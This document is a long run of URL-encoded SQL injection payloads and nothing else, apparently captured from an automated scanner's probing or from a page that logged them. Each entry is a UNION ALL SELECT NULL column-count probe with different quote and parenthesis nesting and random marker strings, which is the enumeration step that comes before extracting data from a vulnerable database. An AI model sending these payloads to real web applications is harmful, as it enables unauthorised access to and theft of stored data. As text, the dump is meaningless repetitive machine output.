1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27nOaF%27%20LIKE%20%27nOaF 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27dTgw%27%20LIKE%20%27dTgw 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27mTEW%27%20LIKE%20%27mTEW 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27lPbF%27%20LIKE%20%27lPbF 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27tSwe%27%20LIKE%20%27tSwe 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27xNVp%27%20LIKE%20%27xNVp 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27HuGU%27%20LIKE%20%27HuGU 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27OPjv%27%20LIKE%20%27OPjv 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27fzdg%27%20LIKE%20%27fzdg 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27cbMe%27%20LIKE%20%27cbMe 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27HQfI%27%20LIKE%20%27HQfI 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27JHPq%27%20LIKE%20%27JHPq 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27kKmX%27%20LIKE%20%27kKmX 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27lQwr%27%20LIKE%20%27lQwr 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27TQPI%27%20LIKE%20%27TQPI 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27RiEL%27%20LIKE%20%27RiEL 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27zaix%27%20LIKE%20%27zaix 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27tHPg%27%20LIKE%20%27tHPg 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27yfae%27%20LIKE%20%27yfae 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27hQrV%27%20LIKE%20%27hQrV 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27EWTr%27%20LIKE%20%27EWTr 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27ixow%27%20LIKE%20%27ixow 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27pici%27%20LIKE%20%27pici 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27FqNx%27%20LIKE%20%27FqNx 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27avDM%27%20LIKE%20%27avDM 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27dlbo%27%20LIKE%20%27dlbo 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27NOXP%27%20LIKE%20%27NOXP 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27tkLq%27%20LIKE%20%27tkLq 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27tkjH%27%20LIKE%20%27tkjH 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27epvA%27%20LIKE%20%27epvA 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27HkrL%27%20LIKE%20%27HkrL 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27sdfh%27%20LIKE%20%27sdfh 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27FDbZ%27%20LIKE%20%27FDbZ 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27huzq%27%20LIKE%20%27huzq 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22KqvZ%22%3D%22KqvZ 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22hDwW%22%3D%22hDwW 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22sXrI%22%3D%22sXrI 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22eLvS%22%3D%22eLvS 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22VUch%22%3D%22VUch 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22GtJD%22%3D%22GtJD 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22OVTU%22%3D%22OVTU 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22oQoc%22%3D%22oQoc 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22EPcZ%22%3D%22EPcZ 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22KiKo%22%3D%22KiKo 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22DdnJ%22%3D%22DdnJ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22cNnl%22%3D%22cNnl 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22UBcP%22%3D%22UBcP 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22tHwP%22%3D%22tHwP 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22YTlG%22%3D%22YTlG 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22zdgs%22%3D%22zdgs 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22bbbi%22%3D%22bbbi 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22kqvE%22%3D%22kqvE 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22NUHV%22%3D%22NUHV 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22QKaE%22%3D%22QKaE 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22bWEN%22%3D%22bWEN 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22HeSs%22%3D%22HeSs 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22FYrq%22%3D%22FYrq 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22buMn%22%3D%22buMn 